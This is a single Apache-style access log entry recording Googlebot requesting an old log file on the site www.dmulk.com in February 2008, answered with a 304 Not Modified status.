66.249.70.19 - - [08/Feb/2008:08:22:23 -0800] "GET /logs/access_071205.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
